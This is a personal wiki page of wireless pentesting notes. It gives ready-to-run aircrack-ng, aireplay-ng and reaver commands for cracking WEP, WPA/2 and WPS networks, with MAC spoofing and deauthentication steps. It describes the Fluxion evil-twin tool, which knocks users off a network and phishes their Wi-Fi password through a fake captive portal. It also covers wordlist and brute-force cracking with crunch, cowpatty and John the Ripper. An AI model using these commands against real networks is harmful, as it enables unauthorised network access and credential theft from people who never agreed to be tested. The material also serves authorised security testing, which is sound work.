Pentest Wireless Hacking

From Batserver Wiki
Jump to: navigation, search

Hardware

I personally use either of 2 items that I carry around in my hackers tool-belt.

ALFA Network card AWUS036NH - 802.11 b/g/n Long-Rage Approx £30 / $50

TP-LINK TL-WN722N - 150Mbs High-gain Approx £12 / $20


Attacking

WEP

Configure Interface:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac aa:bb:cc:dd:ee:ff wlan0
airmon-ng start wlan0

Scan for networks:

airodump-ng mon0

Target AP:

airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

Attack:

aireplay-ng -1 0 -a (bssid) -h aa:bb:cc:dd:ee:ff -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h aa:bb:cc:dd:ee:ff wlan0
(captured data will have to be above 10,000 to crack)

Cracking:

aircrack-ng -b (bssid) (file_name-01.cap)


WPA/2

  Configure Interface:

ifconfig wlan0 down
airmon-ng stop wlan0
macchanger --mac=aa:bb:cc:dd:ee:ff wlan0
airmon-ng start wlan0

Scan for networks:

airodump-ng wlan0

Choose your target and then:

airodump-ng --channel 6 wlan0 -w Desktop/CapFileName

Attack using AP MAC and Client MAC:

aireplay-ng -0 10 -a 00:1D:AA:30:6A:F9 mon0 --ignore-negative-one
aircrack-ng -w ~/Desktop/Wordlist/CRACKED_PASS.dic /root/Desktop/CapFileName


WPS

$ wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
7C:4C:A5:77:52:B9       1            00        1.0               No                SKYDFA47
E4:F4:C6:79:99:20       6            00        1.0               Yes               leonteale-2Ghz
$ reaver -i mon0 -b E4:F4:C6:79:99:20 -c 6 -f -e leonteale-2Ghz -a -S -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from E4:F4:C6:79:99:20
[+] Associated with E4:F4:C6:79:99:20 (ESSID: leonteale-2Ghz)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

Social Engineering

Fluxion

Github Fluxion

Fluxion is a remake of linset by vk496 with (hopefully) less bugs and more functionality. It's compatible with the latest release of Kali (rolling). If you're new, or just don't understand much about the project, have a look at the wiki. The attack is mostly manual, but experimental versions will automatically handle most functionality from the stable releases.

Install

  git clone https://github.com/deltaxflux/fluxion

How it works

   Scan the networks.
   Capture a handshake (can't be used without a valid handshake, it's necessary to verify the password)
   Use WEB Interface *
   Launch a FakeAP instance to imitate the original access point
   Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password.
   A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
   A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
   Each submitted password is verified by the handshake captured earlier
   The attack will automatically terminate, as soon as a correct password is submitted

Requirements

A Linux-based operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. An external wifi card is recommended.

Cracking

Crunch

crunch 8 8 1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ -t 97KQA@@@ | aircrack-ng -b 78:54:2E:28:E7:86 -w - thehak-01.cap

Passgen

Passgen is an simple Python alternative for the random character generator Crunch which attempts to solve cracking WPA/WPA2 keys by randomizing the output as opposed to generating a list like so (aaaaaaaa, aaaaaaab, aaaaaac, etc).

Example usage with aircrack-ng:

python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w- WiFi.cap

Some other options are: * The Associative Word List Generator (AWLG) – Wordlists for Password Cracking * CeWL – Custom Word List Generator Tool for Password Cracking * RSMangler – Keyword Based Wordlist Generator For Bruteforcing * CUPP – Common User Passwords Profiler – Automated Password Profiling Tool Of course John the Ripper (JTR) has some built in options for creating permutations from Wordlists.

Cowpatty

$ ./cowpatty -r eap-test.dump -f dict -s somethingclever
coWPAtty 2.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against passphrase.
Loading words into memory, please be patient ... Done (10201 words).
Starting dictionary attack.  Please be patient.
[1000] [2000] [3000] [4000] 
The PSK is "family movie night".

4087 passphrases tested in 59.05 seconds:  69.22 passphrases/second

This tool can also accept dictionary words from STDIN, allowing us to utilize a tool such as John the Ripper to create lots of word permutations from a dictionary file:

$ john -wordfile:dictfile -rules -session:johnrestore.dat -stdout:63 | cowpatty -r eap-test.dump -f - -s somethingclever

In the default configuration of John the Ripper, common permutations of dictionary words will be sent as potential passwords to coWPAtty. For example, here is a list of the words John will create from the input word "password":

$ echo password >word
$ john -session:/tmp/delme -wordfile:word -rules -stdout

password
Password
passwords
password1
Password1
drowssap
1password
PASSWORD
password2
password!
password3
password7
password9
password5
password4
password8
password6
password0
password.
password?
psswrd
drowssaP
Drowssap
passworD
2password
4password
Password2
Password!
Password3
Password9
Password5
Password7
Password4
Password6
Password8
Password.
Password?
Password0
3password
7password
9password
5password
6password
8password
Passwords
passworded
passwording
Passworded
Passwording
words: 49  time: 0:00:00:00 100%  w/s: 49.00  current: Passwording

John the Ripper is available at http://www.openwall.com/john/